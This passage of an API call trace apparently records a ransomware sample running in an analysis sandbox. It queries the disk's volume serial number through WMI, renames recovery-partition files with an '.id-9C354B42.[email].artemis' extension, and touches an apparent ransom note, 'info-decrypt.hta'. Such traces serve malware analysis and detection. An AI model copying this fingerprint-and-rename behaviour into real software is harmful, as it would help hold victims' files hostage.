WbemDefPath:IWbemPath:GetText (in: This=0x67209c0, lFlags=4, puBuffLength=0x704efe4*=0xf, pszText="00000000000000" | out: puBuffLength=0x704efe4*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0148.291] CoGetObjectContext (in: riid=0x339b9ac*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x704ef98 | out: ppv=0x704ef98*=0x72015c) returned 0x0 [0148.292] IComThreadingInfo:GetCurrentApartmentType (in: This=0x72015c, pAptType=0x704ef90 | out: pAptType=0x704ef90*=1) returned 0x0 [0148.292] IUnknown:QueryInterface (in: This=0x72015c, riid=0x339b994*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x704ef94 | out: ppvObject=0x704ef94*=0x0) returned 0x80004002 [0148.292] IUnknown:Release (This=0x72015c) returned 0x1 [0148.293] CoGetClassObject (in: rclsid=0x7588a4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x704e900 | out: ppv=0x704e900*=0x6737008) returned 0x0 [0148.293] WbemDefPath:IUnknown:QueryInterface (in: This=0x6737008, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x704eb18 | out: ppvObject=0x704eb18*=0x0) returned 0x80004002 [0148.293] WbemDefPath:IClassFactory:CreateInstance (in: This=0x6737008, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x704eb2c | out: ppvObject=0x704eb2c*=0x6738000) returned 0x0 [0148.293] WbemDefPath:IUnknown:Release (This=0x6737008) returned 0x0 [0148.293] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738000, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x704e74c | out: ppvObject=0x704e74c*=0x6738000) returned 0x0 [0148.293] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738000, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x704e708 | out: ppvObject=0x704e708*=0x0) returned 0x80004002 [0148.293] WbemDefPath:IUnknown:AddRef (This=0x6738000) returned 0x3 [0148.293] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738000, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x704e064 | out: ppvObject=0x704e064*=0x0) returned 0x80004002 [0148.294] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738000, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x704e014 | out: ppvObject=0x704e014*=0x0) returned 0x80004002 [0148.294] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738000, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x704e020 | out: ppvObject=0x704e020*=0x77dad8) returned 0x0 [0148.294] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x77dad8, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x704e028 | out: pCid=0x704e028*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0148.294] WbemDefPath:IUnknown:Release (This=0x77dad8) returned 0x3 [0148.294] CoGetContextToken (in: pToken=0x704e080 | out: pToken=0x704e080) returned 0x0 [0148.294] CoGetContextToken (in: pToken=0x704e488 | out: pToken=0x704e488) returned 0x0 [0148.294] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738000, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x704e518 | out: ppvObject=0x704e518*=0x0) returned 0x80004002 [0148.294] WbemDefPath:IUnknown:Release (This=0x6738000) returned 0x2 [0148.294] WbemDefPath:IUnknown:Release (This=0x6738000) returned 0x1 [0148.294] CoGetContextToken (in: pToken=0x704ee10 | out: pToken=0x704ee10) returned 0x0 [0148.294] CoGetContextToken (in: pToken=0x704ed70 | out: pToken=0x704ed70) returned 0x0 [0148.294] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738000, riid=0x704ee40*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x704ee3c | out: ppvObject=0x704ee3c*=0x6738000) returned 0x0 [0148.294] WbemDefPath:IUnknown:AddRef (This=0x6738000) returned 0x3 [0148.294] WbemDefPath:IUnknown:Release (This=0x6738000) returned 0x2 [0148.294] WbemDefPath:IWbemPath:SetText (This=0x6738000, uMode=0x4, pszPath="\\\\.\\root\\cimv2") returned 0x0 [0148.294] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6738000, puCount=0x704efc0 | out: puCount=0x704efc0*=0x2) returned 0x0 [0148.294] WbemDefPath:IWbemPath:GetText (in: This=0x6738000, lFlags=4, puBuffLength=0x704efbc*=0x0, pszText=0x0 | out: puBuffLength=0x704efbc*=0xf, pszText=0x0) returned 0x0 [0148.294] WbemDefPath:IWbemPath:GetText (in: This=0x6738000, lFlags=4, puBuffLength=0x704efbc*=0xf, pszText="00000000000000" | out: puBuffLength=0x704efbc*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0148.295] CoGetObjectContext (in: riid=0x339b9ac*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x704efc0 | out: ppv=0x704efc0*=0x72015c) returned 0x0 [0148.295] IComThreadingInfo:GetCurrentApartmentType (in: This=0x72015c, pAptType=0x704efb8 | out: pAptType=0x704efb8*=1) returned 0x0 [0148.295] IUnknown:QueryInterface (in: This=0x72015c, riid=0x339b994*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x704efbc | out: ppvObject=0x704efbc*=0x0) returned 0x80004002 [0148.295] IUnknown:Release (This=0x72015c) returned 0x1 [0148.295] CoGetClassObject (in: rclsid=0x7588d4*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x704ebe0 | out: ppv=0x704ebe0*=0x672f178) returned 0x0 [0148.296] WbemLocator:IUnknown:QueryInterface (in: This=0x672f178, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x704edf8 | out: ppvObject=0x704edf8*=0x0) returned 0x80004002 [0148.296] WbemLocator:IClassFactory:CreateInstance (in: This=0x672f178, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x704ee0c | out: ppvObject=0x704ee0c*=0x6737018) returned 0x0 [0148.296] WbemLocator:IUnknown:Release (This=0x672f178) returned 0x0 [0148.296] WbemLocator:IUnknown:QueryInterface (in: This=0x6737018, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x704ea2c | out: ppvObject=0x704ea2c*=0x6737018) returned 0x0 [0148.296] WbemLocator:IUnknown:QueryInterface (in: This=0x6737018, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x704e9e8 | out: ppvObject=0x704e9e8*=0x0) returned 0x80004002 [0148.296] WbemLocator:IUnknown:AddRef (This=0x6737018) returned 0x3 [0148.296] WbemLocator:IUnknown:QueryInterface (in: This=0x6737018, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x704e344 | out: ppvObject=0x704e344*=0x0) returned 0x80004002 [0148.296] WbemLocator:IUnknown:QueryInterface (in: This=0x6737018, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x704e2f4 | out: ppvObject=0x704e2f4*=0x0) returned 0x80004002 [0148.296] WbemLocator:IUnknown:QueryInterface (in: This=0x6737018, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x704e300 | out: ppvObject=0x704e300*=0x0) returned 0x80004002 [0148.296] CoGetContextToken (in: pToken=0x704e360 | out: pToken=0x704e360) returned 0x0 [0148.296] CoGetContextToken (in: pToken=0x704e768 | out: pToken=0x704e768) returned 0x0 [0148.296] WbemLocator:IUnknown:QueryInterface (in: This=0x6737018, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x704e7f8 | out: ppvObject=0x704e7f8*=0x0) returned 0x80004002 [0148.296] WbemLocator:IUnknown:Release (This=0x6737018) returned 0x2 [0148.296] WbemLocator:IUnknown:Release (This=0x6737018) returned 0x1 [0148.297] CoGetContextToken (in: pToken=0x704edd8 | out: pToken=0x704edd8) returned 0x0 [0148.297] CoGetContextToken (in: pToken=0x704ed38 | out: pToken=0x704ed38) returned 0x0 [0148.297] WbemLocator:IUnknown:QueryInterface (in: This=0x6737018, riid=0x704ee08*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x704ee04 | out: ppvObject=0x704ee04*=0x6737018) returned 0x0 [0148.297] WbemLocator:IUnknown:AddRef (This=0x6737018) returned 0x3 [0148.297] WbemLocator:IUnknown:Release (This=0x6737018) returned 0x2 [0148.297] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6738000, puCount=0x704ef9c | out: puCount=0x704ef9c*=0x2) returned 0x0 [0148.297] WbemDefPath:IWbemPath:GetText (in: This=0x6738000, lFlags=8, puBuffLength=0x704ef98*=0x0, pszText=0x0 | out: puBuffLength=0x704ef98*=0xf, pszText=0x0) returned 0x0 [0148.297] WbemDefPath:IWbemPath:GetText (in: This=0x6738000, lFlags=8, puBuffLength=0x704ef98*=0xf, pszText="00000000000000" | out: puBuffLength=0x704ef98*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0148.297] CoCreateInstance (in: rclsid=0x745f1284*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x745f12e4*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0x704ee74 | out: ppv=0x704ee74*=0x6737028) returned 0x0 [0148.297] WbemLocator:IWbemLocator:ConnectServer (in: This=0x6737028, strNetworkResource="\\\\.\\root\\cimv2", strUser=0x0, strPassword=0x0, strLocale="", lSecurityFlags=128, strAuthority="", pCtx=0x0, ppNamespace=0x704ef08 | out: ppNamespace=0x704ef08*=0x67372cc) returned 0x0 [0151.759] WbemLocator:IUnknown:QueryInterface (in: This=0x67372cc, riid=0x745f1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x704eda4 | out: ppvObject=0x704eda4*=0x781724) returned 0x0 [0151.759] WbemLocator:IClientSecurity:QueryBlanket (in: This=0x781724, pProxy=0x67372cc, pAuthnSvc=0x704edf4, pAuthzSvc=0x704edf0, pServerPrincName=0x704ede8, pAuthnLevel=0x704edec, pImpLevel=0x704eddc, pAuthInfo=0x704ede0, pCapabilites=0x704ede4 | out: pAuthnSvc=0x704edf4*=0xa, pAuthzSvc=0x704edf0*=0x0, pServerPrincName=0x704ede8, pAuthnLevel=0x704edec*=0x6, pImpLevel=0x704eddc*=0x2, pAuthInfo=0x704ede0, pCapabilites=0x704ede4*=0x1) returned 0x0 [0151.759] WbemLocator:IUnknown:Release (This=0x781724) returned 0x1 [0151.759] WbemLocator:IUnknown:QueryInterface (in: This=0x67372cc, riid=0x745f10f4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x704ed98 | out: ppvObject=0x704ed98*=0x781744) returned 0x0 [0151.759] WbemLocator:IUnknown:QueryInterface (in: This=0x67372cc, riid=0x745f1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x704ed94 | out: ppvObject=0x704ed94*=0x781724) returned 0x0 [0151.759] WbemLocator:IClientSecurity:SetBlanket (This=0x781724, pProxy=0x67372cc, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0151.759] WbemLocator:IUnknown:Release (This=0x781724) returned 0x2 [0151.759] WbemLocator:IUnknown:Release (This=0x781744) returned 0x1 [0151.759] CoTaskMemFree (pv=0x77e0b8) [0151.760] WbemLocator:IUnknown:Release (This=0x6737028) returned 0x0 [0151.760] WbemLocator:IUnknown:QueryInterface (in: This=0x67372cc, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x704e994 | out: ppvObject=0x704e994*=0x781744) returned 0x0 [0151.760] WbemLocator:IUnknown:QueryInterface (in: This=0x781744, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x704e950 | out: ppvObject=0x704e950*=0x0) returned 0x80004002 [0151.762] WbemLocator:IUnknown:QueryInterface (in: This=0x781744, riid=0x74b4fe90*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x704e76c | out: ppvObject=0x704e76c*=0x0) returned 0x80004002 [0152.362] WbemLocator:IUnknown:AddRef (This=0x781744) returned 0x3 [0152.362] WbemLocator:IUnknown:QueryInterface (in: This=0x781744, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x704e2ac | out: ppvObject=0x704e2ac*=0x0) returned 0x80004002 [0152.934] WbemLocator:IUnknown:QueryInterface (in: This=0x781744, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x704e25c | out: ppvObject=0x704e25c*=0x0) returned 0x80004002 [0152.936] WbemLocator:IUnknown:QueryInterface (in: This=0x781744, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x704e268 | out: ppvObject=0x704e268*=0x7816a4) returned 0x0 [0152.936] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0x7816a4, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x704e270 | out: pCid=0x704e270*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0152.936] WbemLocator:IUnknown:Release (This=0x7816a4) returned 0x3 [0152.936] CoGetContextToken (in: pToken=0x704e2c8 | out: pToken=0x704e2c8) returned 0x0 [0152.937] CoGetContextToken (in: pToken=0x704e6d0 | out: pToken=0x704e6d0) returned 0x0 [0152.937] WbemLocator:IUnknown:QueryInterface (in: This=0x781744, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x704e760 | out: ppvObject=0x704e760*=0x78172c) returned 0x0 [0152.937] WbemLocator:IRpcOptions:Query (in: This=0x78172c, pPrx=0x781744, dwProperty=2, pdwValue=0x704e788 | out: pdwValue=0x704e788) returned 0x80004002 [0152.937] WbemLocator:IUnknown:Release (This=0x78172c) returned 0x3 [0152.937] WbemLocator:IUnknown:Release (This=0x781744) returned 0x2 [0152.937] CoGetContextToken (in: pToken=0x704eca8 | out: pToken=0x704eca8) returned 0x0 [0152.937] CoGetContextToken (in: pToken=0x704ec08 | out: pToken=0x704ec08) returned 0x0 [0152.937] WbemLocator:IUnknown:QueryInterface (in: This=0x781744, riid=0x704ecd8*(Data1=0x9556dc99, Data2=0x828c, Data3=0x11cf, Data4=([0]=0xa3, [1]=0x7e, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x32, [6]=0x40, [7]=0xc7)), ppvObject=0x704ecd4 | out: ppvObject=0x704ecd4*=0x67372cc) returned 0x0 [0152.937] WbemLocator:IUnknown:AddRef (This=0x67372cc) returned 0x4 [0152.937] WbemLocator:IUnknown:Release (This=0x67372cc) returned 0x3 [0152.937] WbemLocator:IUnknown:Release (This=0x67372cc) returned 0x2 [0152.937] SysStringLen (param_1=0x0) returned 0x0 [0152.937] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x67381c0, puCount=0x704f06c | out: puCount=0x704f06c*=0x0) returned 0x0 [0152.937] WbemDefPath:IWbemPath:GetText (in: This=0x67381c0, lFlags=2, puBuffLength=0x704f068*=0x0, pszText=0x0 | out: puBuffLength=0x704f068*=0x20, pszText=0x0) returned 0x0 [0152.937] WbemDefPath:IWbemPath:GetText (in: This=0x67381c0, lFlags=2, puBuffLength=0x704f068*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x704f068*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0152.937] CoGetContextToken (in: pToken=0x704ecd8 | out: pToken=0x704ecd8) returned 0x0 [0152.937] WbemLocator:IUnknown:AddRef (This=0x781744) returned 0x3 [0152.937] WbemLocator:IUnknown:QueryInterface (in: This=0x781744, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x704eb6c | out: ppvObject=0x704eb6c*=0x781744) returned 0x0 [0152.938] WbemLocator:IUnknown:Release (This=0x781744) returned 0x3 [0152.938] WbemLocator:IUnknown:Release (This=0x781744) returned 0x2 [0152.938] WbemDefPath:IWbemPath:GetText (in: This=0x67381c0, lFlags=2, puBuffLength=0x704f070*=0x0, pszText=0x0 | out: puBuffLength=0x704f070*=0x20, pszText=0x0) returned 0x0 [0152.938] WbemDefPath:IWbemPath:GetText (in: This=0x67381c0, lFlags=2, puBuffLength=0x704f070*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x704f070*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0152.938] IWbemServices:GetObject (in: This=0x67372cc, strObjectPath="win32_logicaldisk.deviceid=\"C:\"", lFlags=0, pCtx=0x0, ppObject=0x704f024*=0x0, ppCallResult=0x0 | out: ppObject=0x704f024*=0x673b600, ppCallResult=0x0) returned 0x0 [0154.649] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6738000, puCount=0x704f024 | out: puCount=0x704f024*=0x2) returned 0x0 [0154.649] WbemDefPath:IWbemPath:GetText (in: This=0x6738000, lFlags=4, puBuffLength=0x704f020*=0x0, pszText=0x0 | out: puBuffLength=0x704f020*=0xf, pszText=0x0) returned 0x0 [0154.649] WbemDefPath:IWbemPath:GetText (in: This=0x6738000, lFlags=4, puBuffLength=0x704f020*=0xf, pszText="00000000000000" | out: puBuffLength=0x704f020*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0154.649] IWbemClassObject:Get (in: This=0x673b600, wszName="VolumeSerialNumber", lFlags=0, pVal=0x704f020*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x344655c*=0, plFlavor=0x3446560*=0 | out: pVal=0x704f020*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="9C354B42", varVal2=0x0), pType=0x344655c*=8, plFlavor=0x3446560*=0) returned 0x0 [0154.649] SysStringByteLen (bstr="9C354B42") returned 0x10 [0154.649] SysStringByteLen (bstr="9C354B42") returned 0x10 [0154.649] IWbemClassObject:Get (in: This=0x673b600, wszName="VolumeSerialNumber", lFlags=0, pVal=0x704f028*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x344655c*=8, plFlavor=0x3446560*=0 | out: pVal=0x704f028*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="9C354B42", varVal2=0x0), pType=0x344655c*=8, plFlavor=0x3446560*=0) returned 0x0 [0154.649] SysStringByteLen (bstr="9C354B42") returned 0x10 [0154.649] SysStringByteLen (bstr="9C354B42") returned 0x10 [0154.650] GetFullPathNameW (in: lpFileName="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi", nBufferLength=0x105, lpBuffer=0x704ec28, lpFilePart=0x0 | out: lpBuffer="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi", lpFilePart=0x0) returned 0x39 [0154.650] GetFullPathNameW (in: lpFileName="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi.id-9C354B42.[khalate@tutanota.com].artemis", nBufferLength=0x105, lpBuffer=0x704ec28, lpFilePart=0x0 | out: lpBuffer="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi.id-9C354B42.[khalate@tutanota.com].artemis", lpFilePart=0x0) returned 0x64 [0154.650] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x704f088) returned 1 [0154.650] GetFileAttributesExW (in: lpFileName="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi" (normalized: "c:\\recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi"), fInfoLevelId=0x0, lpFileInformation=0x704f104 | out: lpFileInformation=0x704f104*(dwFileAttributes=0x2006, ftCreationTime.dwLowDateTime=0x27c2fae0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x27c2fae0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x4185decd, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x306000)) returned 1 [0154.650] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x704f084) returned 1 [0154.650] MoveFileW (lpExistingFileName="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi" (normalized: "c:\\recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi"), lpNewFileName="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi.id-9C354B42.[khalate@tutanota.com].artemis" (normalized: "c:\\recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\boot.sdi.id-9c354b42.[khalate@tutanota.com].artemis")) returned 1 [0155.856] GetFullPathNameW (in: lpFileName="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\Winre.wim", nBufferLength=0x105, lpBuffer=0x704eccc, lpFilePart=0x0 | out: lpBuffer="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\Winre.wim", lpFilePart=0x0) returned 0x3a [0155.856] GetFullPathNameW (in: lpFileName="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\Winre.wim", nBufferLength=0x105, lpBuffer=0x704ecc4, lpFilePart=0x0 | out: lpBuffer="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\Winre.wim", lpFilePart=0x0) returned 0x3a [0155.856] GetFullPathNameW (in: lpFileName="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\info-decrypt.hta", nBufferLength=0x105, lpBuffer=0x704eccc, lpFilePart=0x0 | out: lpBuffer="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\info-decrypt.hta", lpFilePart=0x0) returned 0x41 [0155.856] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x704f12c) returned 1 [0155.857] GetFileAttributesExW (in: lpFileName="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\info-decrypt.hta" (normalized: "c:\\recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\info-decrypt.hta"), fInfoLevelId=0x0, lpFileInformation=0x704f1a8 | out: lpFileInformation=0x704f1a8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xfe3214e0, 